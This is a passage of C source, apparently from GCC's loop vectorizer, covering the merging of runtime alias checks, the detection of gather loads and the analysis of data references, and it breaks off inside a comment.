((store_ptr_0 + store_segment_length_0) <= load_ptr_0)
|| (load_ptr_0 + load_segment_length_0) <= store_ptr_0))
for aliasing checks. However, in some cases we can decrease
the number of checks by combining two checks into one. For
example, suppose we have another pair of data refs store_ptr_0
and load_ptr_1, and if the following condition is satisfied:
load_ptr_0 < load_ptr_1 &&
load_ptr_1 - load_ptr_0 - load_segment_length_0 < store_segment_length_0
(this condition means that, in each iteration of the vectorized loop,
the memory accessed through store_ptr_0 cannot lie between the memory
of load_ptr_0 and load_ptr_1.)
we can then use only the following expression to finish the
aliasing checks between store_ptr_0 & load_ptr_0 and
store_ptr_0 & load_ptr_1:
((store_ptr_0 + store_segment_length_0) <= load_ptr_0)
|| (load_ptr_1 + load_segment_length_1 <= store_ptr_0))
Note that we only consider that load_ptr_0 and load_ptr_1 have the
same basic address. */
comp_alias_ddrs.create (may_alias_ddrs.length ());
/* First, we collect all data ref pairs for aliasing checks. */
FOR_EACH_VEC_ELT (may_alias_ddrs, i, ddr)
{
struct data_reference *dr_a, *dr_b;
gimple dr_group_first_a, dr_group_first_b;
tree segment_length_a, segment_length_b;
gimple stmt_a, stmt_b;
dr_a = DDR_A (ddr);
stmt_a = DR_STMT (DDR_A (ddr));
dr_group_first_a = GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt_a));
if (dr_group_first_a)
{
stmt_a = dr_group_first_a;
dr_a = STMT_VINFO_DATA_REF (vinfo_for_stmt (stmt_a));
}
dr_b = DDR_B (ddr);
stmt_b = DR_STMT (DDR_B (ddr));
dr_group_first_b = GROUP_FIRST_ELEMENT (vinfo_for_stmt (stmt_b));
if (dr_group_first_b)
{
stmt_b = dr_group_first_b;
dr_b = STMT_VINFO_DATA_REF (vinfo_for_stmt (stmt_b));
}
if (!operand_equal_p (DR_STEP (dr_a), DR_STEP (dr_b), 0))
length_factor = scalar_loop_iters;
else
length_factor = size_int (vect_factor);
segment_length_a = vect_vfa_segment_size (dr_a, length_factor);
segment_length_b = vect_vfa_segment_size (dr_b, length_factor);
dr_with_seg_len_pair_t dr_with_seg_len_pair
(dr_with_seg_len (dr_a, segment_length_a),
dr_with_seg_len (dr_b, segment_length_b));
if (compare_tree (DR_BASE_ADDRESS (dr_a), DR_BASE_ADDRESS (dr_b)) > 0)
std::swap (dr_with_seg_len_pair.first, dr_with_seg_len_pair.second);
comp_alias_ddrs.safe_push (dr_with_seg_len_pair);
}
/* Second, we sort the collected data ref pairs so that we can scan
them once to combine all possible aliasing checks. */
comp_alias_ddrs.qsort (comp_dr_with_seg_len_pair);
/* Third, we scan the sorted dr pairs and check if we can combine
alias checks of two neighbouring dr pairs. */
for (size_t i = 1; i < comp_alias_ddrs.length (); ++i)
{
/* Deal with two ddrs (dr_a1, dr_b1) and (dr_a2, dr_b2). */
dr_with_seg_len *dr_a1 = &comp_alias_ddrs[i-1].first,
*dr_b1 = &comp_alias_ddrs[i-1].second,
*dr_a2 = &comp_alias_ddrs[i].first,
*dr_b2 = &comp_alias_ddrs[i].second;
/* Remove duplicate data ref pairs. */
if (*dr_a1 == *dr_a2 && *dr_b1 == *dr_b2)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"found equal ranges ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a1->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b1->dr));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a2->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b2->dr));
dump_printf (MSG_NOTE, "\n");
}
comp_alias_ddrs.ordered_remove (i--);
continue;
}
if (*dr_a1 == *dr_a2 || *dr_b1 == *dr_b2)
{
/* We consider the case that DR_B1 and DR_B2 are the same memrefs,
and DR_A1 and DR_A2 are two consecutive memrefs. */
if (*dr_a1 == *dr_a2)
{
std::swap (dr_a1, dr_b1);
std::swap (dr_a2, dr_b2);
}
if (!operand_equal_p (DR_BASE_ADDRESS (dr_a1->dr),
DR_BASE_ADDRESS (dr_a2->dr),
0)
|| !tree_fits_shwi_p (dr_a1->offset)
|| !tree_fits_shwi_p (dr_a2->offset))
continue;
HOST_WIDE_INT diff = (tree_to_shwi (dr_a2->offset)
- tree_to_shwi (dr_a1->offset));
/* Now we check if the following condition is satisfied:
DIFF - SEGMENT_LENGTH_A < SEGMENT_LENGTH_B
where DIFF = DR_A2->OFFSET - DR_A1->OFFSET. However,
SEGMENT_LENGTH_A or SEGMENT_LENGTH_B may not be constant so we
have to make a best estimation. We can get the minimum value
of SEGMENT_LENGTH_B as a constant, represented by MIN_SEG_LEN_B,
then either of the following two conditions can guarantee the
one above:
1: DIFF <= MIN_SEG_LEN_B
2: DIFF - SEGMENT_LENGTH_A < MIN_SEG_LEN_B
*/
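/* Worked example: offsets 0 and 16 give DIFF = 16; with
MIN_SEG_LEN_B = 16, condition 1 holds, so the two checks are merged
and dr_a1's segment grows to seg_len (dr_a2) + 16 below. */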
HOST_WIDE_INT min_seg_len_b = (tree_fits_shwi_p (dr_b1->seg_len)
? tree_to_shwi (dr_b1->seg_len)
: vect_factor);
if (diff <= min_seg_len_b
|| (tree_fits_shwi_p (dr_a1->seg_len)
&& diff - tree_to_shwi (dr_a1->seg_len) < min_seg_len_b))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"merging ranges for ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a1->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b1->dr));
dump_printf (MSG_NOTE, " and ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_a2->dr));
dump_printf (MSG_NOTE, ", ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
DR_REF (dr_b2->dr));
dump_printf (MSG_NOTE, "\n");
}
dr_a1->seg_len = size_binop (PLUS_EXPR,
dr_a2->seg_len, size_int (diff));
comp_alias_ddrs.ordered_remove (i--);
}
}
}
dump_printf_loc (MSG_NOTE, vect_location,
"improved number of alias checks from %d to %d\n",
may_alias_ddrs.length (), comp_alias_ddrs.length ());
if ((int) comp_alias_ddrs.length () >
PARAM_VALUE (PARAM_VECT_MAX_VERSION_FOR_ALIAS_CHECKS))
return false;
return true;
}
/* Check whether a non-affine read in stmt is suitable for gather load
and if so, return a builtin decl for that operation. */
tree
vect_check_gather (gimple stmt, loop_vec_info loop_vinfo, tree *basep,
tree *offp, int *scalep)
{
HOST_WIDE_INT scale = 1, pbitpos, pbitsize;
struct loop *loop = LOOP_VINFO_LOOP (loop_vinfo);
stmt_vec_info stmt_info = vinfo_for_stmt (stmt);
struct data_reference *dr = STMT_VINFO_DATA_REF (stmt_info);
tree offtype = NULL_TREE;
tree decl, base, off;
machine_mode pmode;
int punsignedp, pvolatilep;
base = DR_REF (dr);
/* For masked loads/stores, DR_REF (dr) is an artificial MEM_REF,
see if we can use the def stmt of the address. */
if (is_gimple_call (stmt)
&& gimple_call_internal_p (stmt)
&& (gimple_call_internal_fn (stmt) == IFN_MASK_LOAD
|| gimple_call_internal_fn (stmt) == IFN_MASK_STORE)
&& TREE_CODE (base) == MEM_REF
&& TREE_CODE (TREE_OPERAND (base, 0)) == SSA_NAME
&& integer_zerop (TREE_OPERAND (base, 1))
&& !expr_invariant_in_loop_p (loop, TREE_OPERAND (base, 0)))
{
gimple def_stmt = SSA_NAME_DEF_STMT (TREE_OPERAND (base, 0));
if (is_gimple_assign (def_stmt)
&& gimple_assign_rhs_code (def_stmt) == ADDR_EXPR)
base = TREE_OPERAND (gimple_assign_rhs1 (def_stmt), 0);
}
/* The gather builtins need address of the form
loop_invariant + vector * {1, 2, 4, 8}
or
loop_invariant + sign_extend (vector) * { 1, 2, 4, 8 }.
Unfortunately DR_BASE_ADDRESS/DR_OFFSET can be a mixture
of loop invariants/SSA_NAMEs defined in the loop, with casts,
multiplications and additions in it. To get a vector, we need
a single SSA_NAME that will be defined in the loop and will
contain everything that is not loop invariant and that can be
vectorized. The following code attempts to find such a preexisting
SSA_NAME OFF and put the loop invariants into a tree BASE
that can be gimplified before the loop. */
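/* As a concrete sketch (illustrative, with hypothetical names): for a
read such as
for (i = 0; i < n; i++)
sum += data[idx[i]];
the reference data[idx[i]] decomposes into BASE = &data (loop
invariant), OFF = the in-loop SSA_NAME holding idx[i], and
SCALE = sizeof (data[0]), matching the second form above. */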
base = get_inner_reference (base, &pbitsize, &pbitpos, &off,
&pmode, &punsignedp, &pvolatilep, false);
gcc_assert (base != NULL_TREE && (pbitpos % BITS_PER_UNIT) == 0);
if (TREE_CODE (base) == MEM_REF)
{
if (!integer_zerop (TREE_OPERAND (base, 1)))
{
if (off == NULL_TREE)
{
offset_int moff = mem_ref_offset (base);
off = wide_int_to_tree (sizetype, moff);
}
else
off = size_binop (PLUS_EXPR, off,
fold_convert (sizetype, TREE_OPERAND (base, 1)));
}
base = TREE_OPERAND (base, 0);
}
else
base = build_fold_addr_expr (base);
if (off == NULL_TREE)
off = size_zero_node;
/* If BASE is not loop invariant, then if OFF is 0 we start with just
the constant offset in the loop-invariant BASE and continue with BASE
as OFF; otherwise give up.
We could handle that case by gimplifying the addition of base + off
into some SSA_NAME and use that as off, but for now punt. */
if (!expr_invariant_in_loop_p (loop, base))
{
if (!integer_zerop (off))
return NULL_TREE;
off = base;
base = size_int (pbitpos / BITS_PER_UNIT);
}
/* Otherwise put base + constant offset into the loop invariant BASE
and continue with OFF. */
else
{
base = fold_convert (sizetype, base);
base = size_binop (PLUS_EXPR, base, size_int (pbitpos / BITS_PER_UNIT));
}
/* OFF at this point may be either a SSA_NAME or some tree expression
from get_inner_reference. Try to peel off loop invariants from it
into BASE as long as possible. */
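/* For example (illustrative SSA names): if OFF is inv_1 + off_5 * 8
with inv_1 loop invariant, the PLUS_EXPR case below moves inv_1 into
BASE, leaving OFF = off_5 * 8; the MULT_EXPR case then records
SCALE = 8 and leaves OFF = off_5, a single in-loop SSA_NAME. */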
STRIP_NOPS (off);
while (offtype == NULL_TREE)
{
enum tree_code code;
tree op0, op1, add = NULL_TREE;
if (TREE_CODE (off) == SSA_NAME)
{
gimple def_stmt = SSA_NAME_DEF_STMT (off);
if (expr_invariant_in_loop_p (loop, off))
return NULL_TREE;
if (gimple_code (def_stmt) != GIMPLE_ASSIGN)
break;
op0 = gimple_assign_rhs1 (def_stmt);
code = gimple_assign_rhs_code (def_stmt);
op1 = gimple_assign_rhs2 (def_stmt);
}
else
{
if (get_gimple_rhs_class (TREE_CODE (off)) == GIMPLE_TERNARY_RHS)
return NULL_TREE;
code = TREE_CODE (off);
extract_ops_from_tree (off, &code, &op0, &op1);
}
switch (code)
{
case POINTER_PLUS_EXPR:
case PLUS_EXPR:
if (expr_invariant_in_loop_p (loop, op0))
{
add = op0;
off = op1;
do_add:
add = fold_convert (sizetype, add);
if (scale != 1)
add = size_binop (MULT_EXPR, add, size_int (scale));
base = size_binop (PLUS_EXPR, base, add);
continue;
}
if (expr_invariant_in_loop_p (loop, op1))
{
add = op1;
off = op0;
goto do_add;
}
break;
case MINUS_EXPR:
if (expr_invariant_in_loop_p (loop, op1))
{
add = fold_convert (sizetype, op1);
add = size_binop (MINUS_EXPR, size_zero_node, add);
off = op0;
goto do_add;
}
break;
case MULT_EXPR:
if (scale == 1 && tree_fits_shwi_p (op1))
{
scale = tree_to_shwi (op1);
off = op0;
continue;
}
break;
case SSA_NAME:
off = op0;
continue;
CASE_CONVERT:
if (!POINTER_TYPE_P (TREE_TYPE (op0))
&& !INTEGRAL_TYPE_P (TREE_TYPE (op0)))
break;
if (TYPE_PRECISION (TREE_TYPE (op0))
== TYPE_PRECISION (TREE_TYPE (off)))
{
off = op0;
continue;
}
if (TYPE_PRECISION (TREE_TYPE (op0))
< TYPE_PRECISION (TREE_TYPE (off)))
{
off = op0;
offtype = TREE_TYPE (off);
STRIP_NOPS (off);
continue;
}
break;
default:
break;
}
break;
}
/* If at the end OFF still isn't a SSA_NAME or isn't
defined in the loop, punt. */
if (TREE_CODE (off) != SSA_NAME
|| expr_invariant_in_loop_p (loop, off))
return NULL_TREE;
if (offtype == NULL_TREE)
offtype = TREE_TYPE (off);
decl = targetm.vectorize.builtin_gather (STMT_VINFO_VECTYPE (stmt_info),
offtype, scale);
if (decl == NULL_TREE)
return NULL_TREE;
if (basep)
*basep = base;
if (offp)
*offp = off;
if (scalep)
*scalep = scale;
return decl;
}
/* Function vect_analyze_data_refs.
Find all the data references in the loop or basic block.
The general structure of the analysis of data refs in the vectorizer is as
follows:
1- vect_analyze_data_refs(loop/bb): call
compute_data_dependences_for_loop/bb to find and analyze all data-refs
in the loop/bb and their dependences.
2- vect_analyze_dependences(): apply dependence testing using ddrs.
3- vect_analyze_drs_alignment(): check that ref_stmt.alignment is ok.
4- vect_analyze_drs_access(): check that ref_stmt.step is ok.
*/
bool
vect_analyze_data_refs (loop_vec_info loop_vinfo,
bb_vec_info bb_vinfo,
int *min_vf, unsigned *n_stmts)
{
struct loop *loop = NULL;
basic_block bb = NULL;
unsigned int i;
vec<data_reference_p> datarefs;
struct data_reference *dr;
tree scalar_type;
if (dump_enabled_p ())
dump_printf_loc (MSG_NOTE, vect_location,
"=== vect_analyze_data_refs ===\n");
if (loop_vinfo)
{
basic_block *bbs = LOOP_VINFO_BBS (loop_vinfo);
loop = LOOP_VINFO_LOOP (loop_vinfo);
datarefs = LOOP_VINFO_DATAREFS (loop_vinfo);
if (!find_loop_nest (loop, &LOOP_VINFO_LOOP_NEST (loop_vinfo)))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: loop contains function calls"
" or data references that cannot be analyzed\n");
return false;
}
for (i = 0; i < loop->num_nodes; i++)
{
gimple_stmt_iterator gsi;
for (gsi = gsi_start_bb (bbs[i]); !gsi_end_p (gsi); gsi_next (&gsi))
{
gimple stmt = gsi_stmt (gsi);
if (is_gimple_debug (stmt))
continue;
++*n_stmts;
if (!find_data_references_in_stmt (loop, stmt, &datarefs))
{
if (is_gimple_call (stmt) && loop->safelen)
{
tree fndecl = gimple_call_fndecl (stmt), op;
if (fndecl != NULL_TREE)
{
struct cgraph_node *node = cgraph_node::get (fndecl);
if (node != NULL && node->simd_clones != NULL)
{
unsigned int j, n = gimple_call_num_args (stmt);
for (j = 0; j < n; j++)
{
op = gimple_call_arg (stmt, j);
if (DECL_P (op)
|| (REFERENCE_CLASS_P (op)
&& get_base_address (op)))
break;
}
op = gimple_call_lhs (stmt);
/* Ignore #pragma omp declare simd functions
if they don't have data references in the
call stmt itself. */
if (j == n
&& !(op
&& (DECL_P (op)
|| (REFERENCE_CLASS_P (op)
&& get_base_address (op)))))
continue;
}
}
}
LOOP_VINFO_DATAREFS (loop_vinfo) = datarefs;
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: loop contains function "
"calls or data references that cannot "
"be analyzed\n");
return false;
}
}
}
LOOP_VINFO_DATAREFS (loop_vinfo) = datarefs;
}
else
{
gimple_stmt_iterator gsi;
bb = BB_VINFO_BB (bb_vinfo);
for (gsi = gsi_start_bb (bb); !gsi_end_p (gsi); gsi_next (&gsi))
{
gimple stmt = gsi_stmt (gsi);
if (is_gimple_debug (stmt))
continue;
++*n_stmts;
if (!find_data_references_in_stmt (NULL, stmt,
&BB_VINFO_DATAREFS (bb_vinfo)))
{
/* Mark the rest of the basic-block as unvectorizable. */
for (; !gsi_end_p (gsi); gsi_next (&gsi))
{
stmt = gsi_stmt (gsi);
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (stmt)) = false;
}
break;
}
}
datarefs = BB_VINFO_DATAREFS (bb_vinfo);
}
/* Go through the data-refs, check that the analysis succeeded. Update
pointer from stmt_vec_info struct to DR and vectype. */
FOR_EACH_VEC_ELT (datarefs, i, dr)
{
gimple stmt;
stmt_vec_info stmt_info;
tree base, offset, init;
bool gather = false;
bool simd_lane_access = false;
int vf;
again:
if (!dr || !DR_REF (dr))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: unhandled data-ref\n");
return false;
}
stmt = DR_STMT (dr);
stmt_info = vinfo_for_stmt (stmt);
/* Discard clobbers from the dataref vector. We will remove
clobber stmts during vectorization. */
if (gimple_clobber_p (stmt))
{
free_data_ref (dr);
if (i == datarefs.length () - 1)
{
datarefs.pop ();
break;
}
datarefs.ordered_remove (i);
dr = datarefs[i];
goto again;
}
/* Check that analysis of the data-ref succeeded. */
if (!DR_BASE_ADDRESS (dr) || !DR_OFFSET (dr) || !DR_INIT (dr)
|| !DR_STEP (dr))
{
bool maybe_gather
= DR_IS_READ (dr)
&& !TREE_THIS_VOLATILE (DR_REF (dr))
&& targetm.vectorize.builtin_gather != NULL;
bool maybe_simd_lane_access
= loop_vinfo && loop->simduid;
/* If the target supports vector gather loads, or if this might be
a SIMD lane access, see if one of them can be used. */
if (loop_vinfo
&& (maybe_gather || maybe_simd_lane_access)
&& !nested_in_vect_loop_p (loop, stmt))
{
struct data_reference *newdr
= create_data_ref (NULL, loop_containing_stmt (stmt),
DR_REF (dr), stmt, true);
gcc_assert (newdr != NULL && DR_REF (newdr));
if (DR_BASE_ADDRESS (newdr)
&& DR_OFFSET (newdr)
&& DR_INIT (newdr)
&& DR_STEP (newdr)
&& integer_zerop (DR_STEP (newdr)))
{
if (maybe_simd_lane_access)
{
tree off = DR_OFFSET (newdr);
STRIP_NOPS (off);
if (TREE_CODE (DR_INIT (newdr)) == INTEGER_CST
&& TREE_CODE (off) == MULT_EXPR
&& tree_fits_uhwi_p (TREE_OPERAND (off, 1)))
{
tree step = TREE_OPERAND (off, 1);
off = TREE_OPERAND (off, 0);
STRIP_NOPS (off);
if (CONVERT_EXPR_P (off)
&& TYPE_PRECISION (TREE_TYPE (TREE_OPERAND (off,
0)))
< TYPE_PRECISION (TREE_TYPE (off)))
off = TREE_OPERAND (off, 0);
if (TREE_CODE (off) == SSA_NAME)
{
gimple def = SSA_NAME_DEF_STMT (off);
tree reft = TREE_TYPE (DR_REF (newdr));
if (is_gimple_call (def)
&& gimple_call_internal_p (def)
&& (gimple_call_internal_fn (def)
== IFN_GOMP_SIMD_LANE))
{
tree arg = gimple_call_arg (def, 0);
gcc_assert (TREE_CODE (arg) == SSA_NAME);
arg = SSA_NAME_VAR (arg);
if (arg == loop->simduid
/* For now. */
&& tree_int_cst_equal
(TYPE_SIZE_UNIT (reft),
step))
{
DR_OFFSET (newdr) = ssize_int (0);
DR_STEP (newdr) = step;
DR_ALIGNED_TO (newdr)
= size_int (BIGGEST_ALIGNMENT);
dr = newdr;
simd_lane_access = true;
}
}
}
}
}
if (!simd_lane_access && maybe_gather)
{
dr = newdr;
gather = true;
}
}
if (!gather && !simd_lane_access)
free_data_ref (newdr);
}
if (!gather && !simd_lane_access)
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: data ref analysis "
"failed ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
return false;
}
}
if (TREE_CODE (DR_BASE_ADDRESS (dr)) == INTEGER_CST)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: base addr of dr is a "
"constant\n");
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
if (TREE_THIS_VOLATILE (DR_REF (dr)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: volatile type ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
return false;
}
if (stmt_can_throw_internal (stmt))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: statement can throw an "
"exception ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
if (TREE_CODE (DR_REF (dr)) == COMPONENT_REF
&& DECL_BIT_FIELD (TREE_OPERAND (DR_REF (dr), 1)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: statement is bitfield "
"access ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
base = unshare_expr (DR_BASE_ADDRESS (dr));
offset = unshare_expr (DR_OFFSET (dr));
init = unshare_expr (DR_INIT (dr));
if (is_gimple_call (stmt)
&& (!gimple_call_internal_p (stmt)
|| (gimple_call_internal_fn (stmt) != IFN_MASK_LOAD
&& gimple_call_internal_fn (stmt) != IFN_MASK_STORE)))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: dr in a call ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
/* Update DR field in stmt_vec_info struct. */
/* If the dataref is in an inner-loop of the loop that is considered
for vectorization, we also want to analyze the access relative to
the outer-loop (DR contains information only relative to the
inner-most enclosing loop). We do that by building a reference to the
first location accessed by the inner-loop, and analyze it relative to
the outer-loop. */
if (loop && nested_in_vect_loop_p (loop, stmt))
{
tree outer_step, outer_base, outer_init;
HOST_WIDE_INT pbitsize, pbitpos;
tree poffset;
machine_mode pmode;
int punsignedp, pvolatilep;
affine_iv base_iv, offset_iv;
tree dinit;
/* Build a reference to the first location accessed by the
inner-loop: *(BASE+INIT). (The first location is actually
BASE+INIT+OFFSET, but we add OFFSET separately later). */
tree inner_base = build_fold_indirect_ref
(fold_build_pointer_plus (base, init));
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"analyze in outer-loop: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM, inner_base);
dump_printf (MSG_NOTE, "\n");
}
outer_base = get_inner_reference (inner_base, &pbitsize, &pbitpos,
&poffset, &pmode, &punsignedp, &pvolatilep, false);
gcc_assert (outer_base != NULL_TREE);
if (pbitpos % BITS_PER_UNIT != 0)
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"failed: bit offset alignment.\n");
return false;
}
outer_base = build_fold_addr_expr (outer_base);
if (!simple_iv (loop, loop_containing_stmt (stmt), outer_base,
&base_iv, false))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"failed: evolution of base is not affine.\n");
return false;
}
if (offset)
{
if (poffset)
poffset = fold_build2 (PLUS_EXPR, TREE_TYPE (offset), offset,
poffset);
else
poffset = offset;
}
if (!poffset)
{
offset_iv.base = ssize_int (0);
offset_iv.step = ssize_int (0);
}
else if (!simple_iv (loop, loop_containing_stmt (stmt), poffset,
&offset_iv, false))
{
if (dump_enabled_p ())
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"evolution of offset is not affine.\n");
return false;
}
outer_init = ssize_int (pbitpos / BITS_PER_UNIT);
split_constant_offset (base_iv.base, &base_iv.base, &dinit);
outer_init = size_binop (PLUS_EXPR, outer_init, dinit);
split_constant_offset (offset_iv.base, &offset_iv.base, &dinit);
outer_init = size_binop (PLUS_EXPR, outer_init, dinit);
outer_step = size_binop (PLUS_EXPR,
fold_convert (ssizetype, base_iv.step),
fold_convert (ssizetype, offset_iv.step));
STMT_VINFO_DR_STEP (stmt_info) = outer_step;
/* FIXME: Use canonicalize_base_object_address (base_iv.base); */
STMT_VINFO_DR_BASE_ADDRESS (stmt_info) = base_iv.base;
STMT_VINFO_DR_INIT (stmt_info) = outer_init;
STMT_VINFO_DR_OFFSET (stmt_info) =
fold_convert (ssizetype, offset_iv.base);
STMT_VINFO_DR_ALIGNED_TO (stmt_info) =
size_int (highest_pow2_factor (offset_iv.base));
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"\touter base_address: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_BASE_ADDRESS (stmt_info));
dump_printf (MSG_NOTE, "\n\touter offset from base address: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_OFFSET (stmt_info));
dump_printf (MSG_NOTE,
"\n\touter constant offset from base address: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_INIT (stmt_info));
dump_printf (MSG_NOTE, "\n\touter step: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_STEP (stmt_info));
dump_printf (MSG_NOTE, "\n\touter aligned to: ");
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_DR_ALIGNED_TO (stmt_info));
dump_printf (MSG_NOTE, "\n");
}
}
if (STMT_VINFO_DATA_REF (stmt_info))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: more than one data ref "
"in stmt: ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
free_data_ref (dr);
return false;
}
STMT_VINFO_DATA_REF (stmt_info) = dr;
if (simd_lane_access)
{
STMT_VINFO_SIMD_LANE_ACCESS_P (stmt_info) = true;
free_data_ref (datarefs[i]);
datarefs[i] = dr;
}
/* Set vectype for STMT. */
scalar_type = TREE_TYPE (DR_REF (dr));
STMT_VINFO_VECTYPE (stmt_info)
= get_vectype_for_scalar_type (scalar_type);
if (!STMT_VINFO_VECTYPE (stmt_info))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: no vectype for stmt: ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, " scalar_type: ");
dump_generic_expr (MSG_MISSED_OPTIMIZATION, TDF_DETAILS,
scalar_type);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
if (bb_vinfo)
break;
if (gather || simd_lane_access)
{
STMT_VINFO_DATA_REF (stmt_info) = NULL;
if (gather)
free_data_ref (dr);
}
return false;
}
else
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_NOTE, vect_location,
"got vectype for stmt: ");
dump_gimple_stmt (MSG_NOTE, TDF_SLIM, stmt, 0);
dump_generic_expr (MSG_NOTE, TDF_SLIM,
STMT_VINFO_VECTYPE (stmt_info));
dump_printf (MSG_NOTE, "\n");
}
}
/* Adjust the minimal vectorization factor according to the
vector type. */
vf = TYPE_VECTOR_SUBPARTS (STMT_VINFO_VECTYPE (stmt_info));
if (vf > *min_vf)
*min_vf = vf;
if (gather)
{
tree off;
gather = 0 != vect_check_gather (stmt, loop_vinfo, NULL, &off, NULL);
if (gather
&& get_vectype_for_scalar_type (TREE_TYPE (off)) == NULL_TREE)
gather = false;
if (!gather)
{
STMT_VINFO_DATA_REF (stmt_info) = NULL;
free_data_ref (dr);
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: not suitable for gather "
"load ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
datarefs[i] = dr;
STMT_VINFO_GATHER_P (stmt_info) = true;
}
else if (loop_vinfo
&& TREE_CODE (DR_STEP (dr)) != INTEGER_CST)
{
if (nested_in_vect_loop_p (loop, stmt)
|| !DR_IS_READ (dr))
{
if (dump_enabled_p ())
{
dump_printf_loc (MSG_MISSED_OPTIMIZATION, vect_location,
"not vectorized: not suitable for strided "
"load ");
dump_gimple_stmt (MSG_MISSED_OPTIMIZATION, TDF_SLIM, stmt, 0);
dump_printf (MSG_MISSED_OPTIMIZATION, "\n");
}
return false;
}
STMT_VINFO_STRIDE_LOAD_P (stmt_info) = true;
}
}
/* If we stopped analysis at the first dataref we could not analyze
when trying to vectorize a basic-block, mark the rest of the datarefs
as not vectorizable and truncate the vector of datarefs. That
avoids spending useless time analyzing their dependences. */
if (i != datarefs.length ())
{
gcc_assert (bb_vinfo != NULL);
for (unsigned j = i; j < datarefs.length (); ++j)
{
data_reference_p dr = datarefs[j];
STMT_VINFO_VECTORIZABLE (vinfo_for_stmt (DR_STMT (dr))) = false;
free_data_ref (dr);
}
datarefs.truncate (i);
}
return true;
}
/* Function vect_get_new_vect_var.
Returns a name for a new variable. The current naming scheme uses the
prefix "vect", "stmp" or "vectp" (depending on the value of VAR_KIND)
for vectorizer-generated variables, followed by "_" and NAME when NAME
is provided. */
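/* E.g. (illustrative), vect_get_new_vect_var (ptr_type,
vect_pointer_var, "in") creates a variable named "vectp_in"; with
NAME == NULL the bare prefix "vectp" is used. Later SSA versioning
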